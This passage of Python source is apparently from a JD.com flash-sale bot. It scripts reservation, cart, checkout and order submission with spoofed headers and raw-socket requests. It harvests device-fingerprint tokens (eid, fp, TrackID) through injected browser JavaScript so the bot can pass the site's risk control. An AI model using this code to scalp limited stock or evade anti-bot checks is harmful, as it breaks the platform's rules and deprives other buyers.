self.headers.copy() if fast_mode: request_sku_seckill_url_request_headers['Host'] = 'marathon.jd.com' def request_sku_seckill_url_request(sku_id): logger.info('访问商品抢购链接请求') request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' url = self.seckill_url.get(sku_id) is_pass = self.is_request_seckill_url.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=request_sku_seckill_url_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_request_seckill_url[sku_id] = 'pass' return resp else: return is_pass else: def request_sku_seckill_url_request(sku_id): headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } return self.sess.get(url=self.seckill_url.get(sku_id), headers=headers, allow_redirects=False, timeout=(0.1, 0.08)) self.request_info['request_sku_seckill_url_request'] = request_sku_seckill_url_request # 初始化访问抢购订单结算页面请求方法 request_seckill_checkout_page_request_headers = self.headers.copy() # if fast_mode and is_risk_control is False: if fast_mode: # request_seckill_checkout_page_request_headers['cookie'] = self.cookies_str request_seckill_checkout_page_request_headers['Host'] = 'marathon.jd.com' def request_seckill_checkout_page_request(sku_id, num): logger.info('抢购订单结算页面请求') url = 'https://marathon.jd.com/seckill/seckill.action' request_sku_seckill_url_request_headers['Referer'] = f'https://item.jd.com/{sku_id}.html' is_pass = self.is_seckill_checkout_page.get(sku_id) if not is_pass: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', params={ 'skuId': sku_id, 'num': num, 'rid': int(time.time()) }, headers=request_seckill_checkout_page_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() self.is_seckill_checkout_page[sku_id] = True return resp else: return is_pass else: def request_seckill_checkout_page_request(sku_id, num): url = 'https://marathon.jd.com/seckill/seckill.action' payload = { 'skuId': sku_id, 'num': num, 'rid': int(time.time()) } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://item.jd.com/{}.html'.format(sku_id), } self.sess.get(url=url, params=payload, headers=headers, timeout=(0.1, 0.08)) self.request_info['request_seckill_checkout_page_request'] = request_seckill_checkout_page_request # 初始化获取秒杀初始化信息请求方法(包括:地址,发票,token) get_seckill_init_info_request_headers = self.headers.copy() if fast_mode: # get_seckill_init_info_request_headers['cookie'] = self.cookies_str get_seckill_init_info_request_headers['Host'] = 'marathon.jd.com' def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' resp = http_util.send_http_request(self.socket_client, url=url, method='POST', data={ 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', }, headers=get_seckill_init_info_request_headers, cookies=self.get_cookies_str_by_domain_or_path('marathon.jd.com')) # logger.info(resp.body) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) if resp.status == 302: return resp.headers['location'] # self.get_and_update_cookies_str() return resp.body else: def get_seckill_init_info_request(sku_id, num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/init.action' data = { 'sku': sku_id, 'num': num, 'isModifyAddress': 'false', } headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', } return self.sess.post(url=url, data=data, headers=headers).text self.request_info['get_seckill_init_info_request'] = get_seckill_init_info_request # 初始化提交抢购(秒杀)订单请求方法 submit_seckill_order_request_headers = self.headers.copy() if fast_mode: # submit_seckill_order_request_headers['cookie'] = cookie_str submit_seckill_order_request_headers['Host'] = 'marathon.jd.com' def submit_seckill_order_request(sku_id=None, server_buy_time=int(time.time()), num=1): logger.info('提交抢购(秒杀)订单请求') url = 'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' submit_seckill_order_request_headers[ 'Referer'] = f'https://marathon.jd.com/seckill/seckill.action?skuId={sku_id}&num={num}&rid={server_buy_time} ' if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = http_util.send_http_request(self.socket_client, url=url, method='POST', params={'skuId': sku_id}, data=self.seckill_order_data.get(sku_id), headers=submit_seckill_order_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'marathon.jd.com')) body = resp.body logger.info(body) resp_json = parse_json(body) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False else: def submit_seckill_order_request(sku_id, server_buy_time=int(time.time()), num=1): url = 'https://marathon.jd.com/seckillnew/orderService/pc/submitOrder.action' payload = { 'skuId': sku_id, } if not self.seckill_order_data.get(sku_id): self.seckill_order_data[sku_id] = self._gen_seckill_order_data(sku_id, num) headers = { 'User-Agent': self.user_agent, 'Host': 'marathon.jd.com', 'Referer': 'https://marathon.jd.com/seckill/seckill.action?skuId={0}&num={1}&rid={2}'.format( sku_id, num, server_buy_time), } retry_interval = 0.1 retry_count = 0 while retry_count < 10: resp_json = None try: resp = self.sess.post(url=url, headers=headers, params=payload, data=self.seckill_order_data.get(sku_id), timeout=(0.1, 0.08)) logger.info(resp.text) resp_json = parse_json(resp.text) except Exception as e: logger.error('秒杀请求出错:%s', str(e)) retry_count += 1 time.sleep(retry_interval) # 返回信息 # 抢购失败: # {'errorMessage': '很遗憾没有抢到,再接再厉哦。', 'orderId': 0, 'resultCode': 60074, 'skuId': 0, 'success': False} # {'errorMessage': '抱歉,您提交过快,请稍后再提交订单!', 'orderId': 0, 'resultCode': 60017, 'skuId': 0, 'success': False} # {'errorMessage': '系统正在开小差,请重试~~', 'orderId': 0, 'resultCode': 90013, 'skuId': 0, 'success': False} # 抢购成功: # {"appUrl":"xxxxx","orderId":820227xxxxx,"pcUrl":"xxxxx","resultCode":0,"skuId":0,"success":true,"totalMoney":"xxxxx"} if resp_json.get('success'): order_id = resp_json.get('orderId') total_money = resp_json.get('totalMoney') pay_url = 'https:' + resp_json.get('pcUrl') logger.info('抢购成功,订单号: %s, 总价: %s, 电脑端付款链接: %s', order_id, total_money, pay_url) return True else: logger.info('抢购失败,返回信息: %s', resp_json) retry_count += 1 time.sleep(retry_interval) return False self.request_info['submit_seckill_order_request'] = submit_seckill_order_request return server_buy_time, realy_buy_time def new_init_seckill_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() config = self.config sku_id = config.sku_id zzz = self.item_zzz.get(sku_id) retry_count = 0 item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text while zzz is None: retry_count += 1 logger.info('加载订单') if not self.new_parse_item_detail_page(sku_id, item_page): if retry_count > 10: logger.error('无法获取zzz,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次加载订单失败', retry_count) retry_count += 1 time.sleep(1) if item_page_resp.status_code != requests.codes.OK or not item_page: item_page_resp = self.new_get_item_detail_page(sku_id) item_page = item_page_resp.text continue else: zzz = self.item_zzz.get(sku_id) area_id = parse_area_id(self.area_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) special_attrs = self.special_attrs.get(sku_id) # 初始化预约抢购时间 server_buy_time, realy_buy_time = self.new_init_yuyue_buy_time(sku_id, item_page) if server_buy_time > int(time.time()): hasYuyue_match = re.search(r'"hasYuyue":"(.*)"', item_page) if hasYuyue_match: hasYuyue = hasYuyue_match.group(1) if hasYuyue == '0' or hasYuyue == 0: self.new_reserve(sku_id) elif hasYuyue == '1' or hasYuyue == 1: logger.info('商品已预约,跳过自动预约') else: logger.info('商品已开售,跳过自动预约') # 初始化加载订单请求方法 if fast_mode: get_confirm_order_page_request_headers = self.headers.copy() get_confirm_order_page_request_headers['Host'] = 'wq.jd.com' get_confirm_order_page_request_headers['dnt'] = '1' get_confirm_order_page_request_headers['referer'] = 'https://item.m.jd.com/' get_confirm_order_page_request_headers['sec-fetch-dest'] = 'document' get_confirm_order_page_request_headers['sec-fetch-mode'] = 'navigate' get_confirm_order_page_request_headers['sec-fetch-site'] = 'same-site' get_confirm_order_page_request_headers['sec-fetch-user'] = '?1' get_confirm_order_page_request_headers['upgrade-insecure-requests'] = '1' get_confirm_order_promise_uuid_headers = self.headers.copy() get_confirm_order_headers = self.headers.copy() def parsing_submit_page_data(html): data = dict() page_data = nested_parser('{', '}', html, 'token2') if '"errId":"0"' not in page_data: logger.error('加载订单页数据失败,响应数据:%s', page_data) raise AsstException('加载订单页数据失败') if isinstance(page_data, str): token2search = re.search(r'"token2":\"(.*)\"', page_data) if token2search: data['token2'] = token2search.group(1) skulistsearch = re.search(r'"skulist":\"(.*)\"', page_data) if skulistsearch: data['skulist'] = skulistsearch.group(1) traceIdsearch = re.search(r'"traceId":\"(.*)\"', page_data) if traceIdsearch: data['traceid'] = traceIdsearch.group(1) mainSkusearch = re.search(r'"promotion":({([^}])*})', page_data) if mainSkusearch: data['discountPrice'] = json.loads(mainSkusearch.group(1))['discountPrice'] cidsearch = re.search(r'"cid":\"(.*)\"', page_data) if cidsearch: data['cid'] = cidsearch.group(1).split('_')[2] sucPageTypesearch = re.search(r'"sucPageType":\"(.*)\"', page_data) if sucPageTypesearch: data['sucPageType'] = sucPageTypesearch.group(1) vender_cart = nested_parser('[', ']', page_data, '"jdShipment":') if isinstance(vender_cart, str): venderIdsearch = re.search(r'"venderId":\"(.*)\"', vender_cart) if venderIdsearch: data['venderId'] = venderIdsearch.group(1) jdShipmentsearch = re.search(r'"jdShipment":\"(.*)\"', vender_cart) if jdShipmentsearch: data['jdShipment'] = jdShipmentsearch.group(1) shipment_str = nested_inner_parser('[', ']', vender_cart, '"promiseSendPay":') if isinstance(shipment_str, str): shipment = json.loads(shipment_str) if shipment: data['shipment'] = shipment return data def parse_promise_uuid(resp_text): resp_json = nested_parser('{', '}', resp_text, "errId") if isinstance(resp_json, str): ship_effect = json.loads(resp_json) promise_uuid = ship_effect['pickshipment']['promiseUuid'] elif isinstance(resp_json, list): ship_effect = json.loads(resp_json[0]) promise_uuid = ship_effect['pickshipment']['promiseUuid'] else: promise_uuid = '' return promise_uuid def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): logger.info('加载订单页面请求') jxsid = str(int(time.time() * 1000)) + str(random.random())[2:7] url = 'https://wq.jd.com/deal/confirmorder/main?jxsid=' + jxsid sceneval = '2' referer_url = f'https://item.m.jd.com/product/{sku_id}.html?sceneval={sceneval}&jxsid={jxsid}' commlist = f'{sku_id},,1,{sku_id},1,0,0' confirm_order_page_params = f'{self.item_url_param.get(sku_id)}&commlist={commlist}' \ f'&wdref={parse.quote(referer_url, safe="")}' referer = f'{referer_url}&{confirm_order_page_params}' get_confirm_order_page_request_headers['Referer'] = referer_url get_confirm_order_promise_uuid_headers['Referer'] = referer if not self.get_submit_referer.get(sku_id): self.get_submit_referer[sku_id] = referer self.sess.cookies.set('_modc', zzz) retry_interval = config.retry_interval retry_count = 0 submit_page_data = self.get_submit_page_data.get(sku_id) while not submit_page_data: if retry_count >= 10: logger.error("加载订单页面请求失败,终止抢购!") exit(-1) try: resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_page_request_headers, params=confirm_order_page_params, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com')) resp_data = resp.body if resp_data.startswith("<!DOCTYPE html>"): submit_page_data = self.get_submit_page_data.get(sku_id) if not submit_page_data: submit_page_data = parsing_submit_page_data(resp_data) # 从响应头中提取cookies并更新 cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) self.get_submit_page_data[sku_id] = submit_page_data break except Exception as e: logger.error("异常信息:%s", e) retry_count += 1 logger.info("商品%s第%s次加载订单页面请求失败,%s秒后重试", sku_id, retry_count, retry_interval) time.sleep(retry_interval) promise_uuid_retry_interval = 0.02 promise_uuid = self.get_promiseUuid.get(sku_id) if not promise_uuid: with self.sem: # 订单页参数请求 if not self.get_promiseUuid.get(sku_id): i = 0 while i < 8: try: shipeffect_params = { 'reg': 1 , 'action': 1 , 'reset': 1 , 'callback': f'preShipeffectCb{self.letterMap[i + 1]}' , 'r': random.random() , 'sceneval': 2 , 'traceid': submit_page_data.get('traceid') } logger.info('加载订单页参数请求') url = 'https://wq.jd.com/deal/mship/shipeffect' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=get_confirm_order_promise_uuid_headers, cookies=self.get_cookies_str_by_domain_or_path( 'wq.jd.com'), params=shipeffect_params) promise_uuid = parse_promise_uuid(resp.body) if promise_uuid is not None: self.get_promiseUuid[sku_id] = promise_uuid break # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() except Exception as e: logger.error("异常信息:%s", e) i += 1 logger.info("商品%s第%s次订单页参数请求失败,%s秒后重试", sku_id, i, promise_uuid_retry_interval) time.sleep(promise_uuid_retry_interval) submit_data = self.get_submit_data.get(sku_id) if not submit_data: with self.sem: # 订单参数处理 if not self.get_submit_data.get(sku_id): discountPrice = submit_page_data.pop('discountPrice', '') cid = submit_page_data.pop('cid', '') shipment = submit_page_data.pop('shipment', '') venderId = submit_page_data.pop('venderId', '') jdShipment = submit_page_data.pop('jdShipment', '') params_list = [] params_list.append( 'paytype=0&paychannel=1&action=1&reg=1&type=0&gpolicy=&platprice=0&pick=&savepayship=0&sceneval=2&setdefcoupon=0') params_list.append('&tuanfull=') params_list.append(submit_page_data.pop('sucPageType', '')) for key, value in submit_page_data.items(): params_list.append(f'&{key}={value}') params_list.append(f'&valuableskus={sku_id},{config.num},{discountPrice},{cid}') params_list.append(f'&commlist={commlist}') params_list.append('&dpid=&scan_orig=') # params_list.append(f'&dpid={?}') # params_list.append(f'&scan_orig={?}') # 处理shipment shipmentData = None shipName = None shipType = '0' for i, data in enumerate(shipment): shipType = data.get('type') if shipType == '0': shipmentData = data shipName = ["jd311", "jdjzd", "jd411"][i] break elif shipType == '1' \ or shipType == '2': shipmentData = data shipName = "shipsop" break elif shipType == '3' \ or shipType == '6': # var _ = new K.default(e,n,t,h,i); # _.supported ? u[_.name] = _ : p[_.name] = _; break elif shipType == '4': # "1" == n.selected && "0" == e.jdShipment && (e.isTenVideo = !0, # h.isTenVideo = !0, # h.fpbarTipLoc = e.isloc, # h.fpbarTipTen = !e.isloc); break elif shipType == '5': # var g, y, b = !1; # if (ce.supSopJd = !0, # e.smallProducts.length > 0) # (0, # D.default)(g = oe.smallShipments).call(g, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? u[r.name] = r : p[r.name] = r # }); # if (e.laProducts.length > 0) # (0, # D.default)(y = oe.largeShipments).call(y, function(a) { # var r = new a(e,n,t,h,i); # r.supported ? (u[r.name] = r, # b = !0) : p[r.name] = r # }); # if (e.laProducts.length > 0) { # var w = new U.default(e,n,t,h,i); # w.supported && !b ? u[w.name] = w : p[w.name] = w # } break elif shipType == '7': # if ("1" == n.supported) { # var S = new G.default(e,n,t,h,i); # S.supported ? u[S.name] = S : p[S.name] = S # } break elif shipType == '8': # var x = new F.default(e,n,t,h,i); # x.supported && (u[x.name] = x); break elif shipType == '9': # var P = new M.default(e,n,t,h,i); # P.supported ? u[P.name] = P : p[P.name] = P; break elif shipType == '10': # var j = new H.default(e,n,t,h,i); # j.supported ? u[j.name] = j : p[j.name] = j break # else: # break # if not shipmentData: # raise AsstException('抢购失败,无法获取订单页收获地址数据,本次抢购结束') # exit(-1) if shipmentData.get('selected') != '1': raise AsstException('抢购失败,订单页收获地址未自动选择,本次抢购结束') exit(-1) ship_list = None promise_uuid_index = None if shipType == '0': ship_list = [''] * 25 promise_uuid_index = 22 elif shipType == '1': ship_list = [''] * 9 promise_uuid_index = 7 elif shipType == '2' \ or shipType == '5' \ or shipType == '9': ship_list = [''] * 20 promise_uuid_index = 17 elif shipType == '8': ship_list = [''] * 10 promise_uuid_index = 8 elif shipType == '10': ship_list = [''] * 5 promise_uuid_index = 4 else: ship_list = [''] * 25 promise_uuid_index = 22 shipId = shipmentData.get('id') ship_list[0] = shipType ship_list[1] = shipId if shipType in ['1', '2', '5', '9', '10']: ship_list[2] = venderId elif shipType == '8': ship_list[2] = '0' else: ship_list[17] = '0' ship_list[promise_uuid_index] = promise_uuid if shipType == '0': # 处理shipName if shipName == 'jd311': ship_list[2] = '4' ship_list[7] = '1' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') ship_list[20] = '' elif shipName == 'jdjzd': ship_list[2] = '6' ship_list[7] = '3' ship_list[9] = shipmentData.get('promiseDate') ship_list[10] = shipmentData.get('promiseTimeRange') ship_list[11] = shipmentData.get('promiseSendPay') ship_list[12] = shipmentData.get('batchId') # t.calendarTag ship_list[18] = '' # t.calendarTag # && t.calendarTag.length # && (0, r.default)(y=t.calendarTag).call(y, function(e){return e.selected}).tagType || "" ship_list[20] = '' elif shipName == 'jd411': ship_list[2] = '5' ship_list[7] = '2' ship_list[11] = shipmentData.get('promiseSendPay') ship_list[5] = '0' ship_list[19] = '0' ship_list[21] = '0' ship_list[24] = '' elif shipType == '2': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '3' \ or shipType == '6': pass elif shipType == '5': if shipmentData: ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = shipmentData.get('promiseTimeRange') ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[15] = "1" if "shipsopjzd" == shipName: ship_list[15] = "2" ship_list[16] = ''# t.calendarTag # && t.calendarTag.length # && (0, c.default)(w=t.calendarTag).call(w, function(e){return e.selected}).tagType | | ""; ship_list[13] = '0' ship_list[19] = '' elif shipType == '7': pass elif shipType == '8': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') ship_list[4] = timeRange ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '立即送达' in timeRange: ship_list[7] = '1' else: ship_list[7] = '2' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' elif shipType == '9': if shipmentData: timeRange = shipmentData.get('promiseTimeRange') ship_list[3] = shipmentData.get('promiseDate') if '下单' in timeRange: ship_list[4] = '立即送达' elif timeRange: ship_list[4] = timeRange else: ship_list[4] = '' ship_list[5] = shipmentData.get('promiseSendPay') ship_list[6] = shipmentData.get('batchId') if '下单' in timeRange: ship_list[14] = '1' elif timeRange: ship_list[14] = '2' else: ship_list[14] = '' else: ship_list[3] = '' ship_list[4] = '' ship_list[5] = '' ship_list[6] = '' ship_list[14] = '' elif shipType == '10': pass else: pass params_list.append(f'&ship={parse.quote("|".join(ship_list), safe="{|,:}")}') submit_data = ''.join(params_list) if submit_data: # 保存submit_data self.get_submit_data[sku_id] = submit_data return submit_data def submit_order_request(submit_data, count): # 新提交订单请求 logger.info('提交订单请求') submit_data = f'{submit_data}&r={random.random()}&callback=confirmCb{self.letterMap[count]}' get_confirm_order_headers['Referer'] = self.get_submit_referer.get(sku_id) try: resp = http_util.send_http_request(self.socket_client, url='https://wq.jd.com/deal/msubmit/confirm', method='GET', headers=get_confirm_order_headers, cookies=self.get_cookies_str_by_domain_or_path('wq.jd.com'), params=submit_data) response_data = resp.body if resp.status == requests.codes.OK: if response_data: if '"errId":"0"' in response_data: logger.info('订单提交完成,在手机APP中可以查看是否完成下单') return True else: logger.info('订单提交失败') logger.info(f'响应数据:\n{response_data}') return False else: logger.info('订单提交失败,响应码:%s', resp.status) return False else: logger.info('订单提交失败,响应码:%s', resp.status) logger.info(f'响应数据:\n{response_data}') return False except Exception as e: logger.error(e) return False else: def get_confirm_order_page_request(sku_id, server_buy_time=int(time.time())): exit(-1) def submit_order_request(submit_data, count): exit(-1) self.request_info['get_confirm_order_page_request'] = get_confirm_order_page_request self.request_info['submit_order_request'] = submit_order_request return server_buy_time, realy_buy_time @check_login def buy_item_in_stock(self, sku_ids, area, wait_all=False, stock_interval=3, submit_retry=3, submit_interval=5): """根据库存自动下单商品 :param sku_ids: 商品id。可以设置多个商品,也可以带数量,如:'1234' 或 '1234,5678' 或 '1234:2' 或 '1234:2,5678:3' :param area: 地区id :param wait_all: 是否等所有商品都有货才一起下单,可选参数,默认False :param stock_interval: 查询库存时间间隔,可选参数,默认3秒 :param submit_retry: 提交订单失败后重试次数,可选参数,默认3次 :param submit_interval: 提交订单失败后重试时间间隔,可选参数,默认5秒 :return: """ items_dict = parse_sku_id(sku_ids) items_list = list(items_dict.keys()) area_id = parse_area_id(area=area) if not wait_all: logger.info('下单模式:%s 任一商品有货并且未下架均会尝试下单', items_list) while True: for (sku_id, count) in items_dict.items(): if not self.if_item_can_be_ordered(sku_ids={sku_id: count}, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', sku_id, stock_interval) else: logger.info('%s 满足下单条件,开始执行', sku_id) self._cancel_select_all_cart_item() self._add_or_change_cart_item(self.get_cart_detail(), sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) else: logger.info('下单模式:%s 所有都商品同时有货并且未下架才会尝试下单', items_list) while True: if not self.if_item_can_be_ordered(sku_ids=sku_ids, area=area_id): logger.info('%s 不满足下单条件,%ss后进行下一次查询', items_list, stock_interval) else: logger.info('%s 满足下单条件,开始执行', items_list) self._cancel_select_all_cart_item() shopping_cart = self.get_cart_detail() for (sku_id, count) in items_dict.items(): self._add_or_change_cart_item(shopping_cart, sku_id, count) if self.submit_order_with_retry(submit_retry, submit_interval): return time.sleep(stock_interval) @check_login def exec_reserve_seckill_by_time(self, config): """定时抢购`预约抢购商品` 一定要确保预约的商品在购物车中才能使用这种方式!!!否则只能用其他方式 预约抢购商品特点: 1.需要提前点击预约 2.大部分此类商品在预约后自动加入购物车,在购物车中可见但无法勾选✓,也无法进入到结算页面(重要特征) 3.到了抢购的时间点后,才能勾选并结算下单 注意: 1.请在抢购开始前手动清空购物车中此类无法勾选的商品!(因为脚本在执行清空购物车操作时,无法清空不能勾选的商品) """ if not config: raise AsstException('初始化配置为空!') self.config = config # 开抢前清空购物车 self.clear_cart() sku_id = config.sku_id area_id = parse_area_id(self.area_id) cat = self.item_cat.get(sku_id) retry_count = 0 while not cat: retry_count += 1 logger.info('第 %s 次获取商品页信息', retry_count) page = self._get_item_detail_page(sku_id) if not self.parse_item_detail_page(sku_id, page): if retry_count > 10: logger.error('无法获取cat,超出重试次数,抢购停止') exit(-1) else: logger.error('第 %s 次获取商品页信息失败:%s', page) time.sleep(1) continue else: cat = self.item_cat.get(sku_id) vender_id = self.item_vender_ids.get(sku_id) param_json = self.param_json.get(sku_id) # special_attrs = self.special_attrs.get(sku_id) # [前置]初始化预约抢购时间 server_buy_time, realy_buy_time = self.init_yuyue_buy_time(sku_id, self.headers.copy(), { # 'callback': 'jQuery{}'.format(random.randint(1000000, 9999999)), 'skuId': sku_id, 'cat': cat, 'area': area_id, 'shopId': vender_id, 'venderId': vender_id, 'paramJson': param_json, 'num': 1, }) # 1.初始化正常下单流程请求信息、方法 self.init_default_order_request_method(config.fast_mode, config.is_risk_control) def start_func(): # 3.执行 if config.is_pass_cart is not True: sku_ids = {config.sku_id: config.num} add_cart_request = self.request_info['add_cart_request'] for sku_id, count in parse_sku_id(sku_ids=sku_ids).items(): payload = { 'pid': sku_id, 'pcount': count, 'ptype': 1, } add_cart_request(payload) # 获取订单结算页面信息 self.get_checkout_page_detail() retry = config.retry interval = config.interval for count in range(1, retry + 1): logger.info('第[%s/%s]次尝试提交订单', count, retry) if self.submit_order(): break logger.info('休息%ss', interval) time.sleep(interval) else: logger.info('执行结束,提交订单失败!') self.start_func = start_func # 2.倒计时 logger.info('准备抢购商品id为:%s', config.sku_id) Timer(buy_time=realy_buy_time, sleep_interval=config.sleep_interval, fast_sleep_interval=config.fast_sleep_interval, is_sync=False, assistant=self).start() if self.config.fast_mode: self.close_now() # 初始化下单必须参数 def init_order_request_info(self): # 获取下单必须参数 br = self.br # 获取:ipLoc-djd、ipLocation if address_util.get_user_address(self) is not True: logger.error('获取地址信息失败,请重试!') exit(-1) if self.use_new: # 获取:eid、fp、jstub、token、sdkToken(默认为空) def jsCallback(data): # print(data) self.data = data if len(data) > 0: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var obj={};for(var count=0;count<20;count++){' 'try{obj=getJdEid()}catch(e){count++;sleep(500)}};return obj})()', jsCallback) count = 0 while True: if br.openUrl('https://idt.jd.com/paypwd/toUpdateOrForget/', jsFunc): if not len(self.data) > 0: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) else: # 获取:eid、fp、track_id、risk_control(默认为空) def jsCallback(data): # print(data) eid = data['eid'] fp = data['fp'] track_id = data['trackId'] if eid: self.eid = eid if fp: self.fp = fp if track_id: self.track_id = track_id if eid and fp and track_id: logger.info('自动初始化下单参数成功!') return True return False jsFunc = CustomBrowser.JsScript('return (function(){var getCookie=function(name){' 'var arr,reg=new RegExp("(^| )"+name+"=([^;]*)(;|$)");' 'if(arr=document.cookie.match(reg)){return unescape(arr[2]);}else{return ' 'null;}},obj={eid:"",fp:"",trackId:""};for(var count=0;count<20;count++){' 'try{getJdEid(function(eid, fp, udfp){var trackId=getCookie("TrackID");' 'if(eid&&fp&&trackId){obj.eid=eid;obj.fp=fp;obj.trackId=trackId;return obj;}' 'else{count++;sleep(500)}})}catch(e){count++;sleep(500)}};return obj})()', jsCallback) # headers = { # # 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9', # 'accept-encoding': 'gzip, deflate, br', # 'accept-language': 'zh-CN,zh;q=0.9,en;q=0.8', # 'cache-control': 'max-age=0', # 'dnt': '1', # 'sec-fetch-dest': 'document', # 'sec-fetch-mode': 'navigate', # 'sec-fetch-site': 'none', # 'sec-fetch-user': '?1', # 'upgrade-insecure-requests': '1', # } count = 0 while True: if br.openUrl('https://order.jd.com/center/list.action', jsFunc): if not self.eid or not self.fp or not self.track_id: if count > 3: logger.error( '初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) else: break else: if count > 3: logger.error('初始化下单参数失败!请在 config.ini 中配置 eid, fp, track_id, risk_control 参数,具体请参考 wiki-常见问题') exit(-1) count += 1 logger.info('初始化下单参数失败!开始第 %s 次重试', count) if br: # 关闭浏览器 br.quit() def init_default_order_request_method(self, fast_mode, is_risk_control): # 提前初始化请求信息、方法 # self.get_and_update_cookies_str() # config = self.config # 初始化添加购物车请求方法 add_cart_request_headers = self.headers.copy() if fast_mode: # add_cart_request_headers['cookie'] = cookie_str def add_cart_request(params): # 为提高性能,并发时先校验一次,不满足再进入锁 if not self.is_add_cart_request.get(0): i = 0 while i < 3: with self.sem: # 进入锁后,需进行二次校验,要确保只请求了一次 if not self.is_add_cart_request.get(0): logger.info('添加购物车请求') try: def res_func(_conn): while True: data = _conn.recv(1) _conn.invalidate() logger.info('添加购物车请求已接收-为提高抢购速度,已截断响应数据') return None url = 'https://cart.jd.com/gate.action' resp = http_util.send_http_request(self.socket_client, url=url, method='GET', headers=add_cart_request_headers, cookies=self.get_cookies_str_by_domain_or_path( 'cart.jd.com'), params=params, res_func=res_func) self.is_add_cart_request[0] = True # 从响应头中提取cookies并更新 # cookie_util.merge_cookies_from_response(self.sess.cookies, resp, url) # self.get_and_update_cookies_str() break except Exception as e: i += 1 logger.error('添加购物车请求异常,开始第 %s 次重试,信息:%s', i, e) else: break else: def add_cart_request(params): i = 0 while i < 3: try: resp = self.sess.get(url='https://cart.jd.com/gate.action', headers=add_cart_request_headers, params=params, timeout=(0.2, 0.03)) if 'https://cart.jd.com/cart.action' in resp.url: # 套装商品加入购物车后直接跳转到购物车页面 result = True else: # 普通商品成功加入购物车后会跳转到提示 "商品已成功加入购物车!" 页面 soup = BeautifulSoup(resp.text, "html.parser") result = 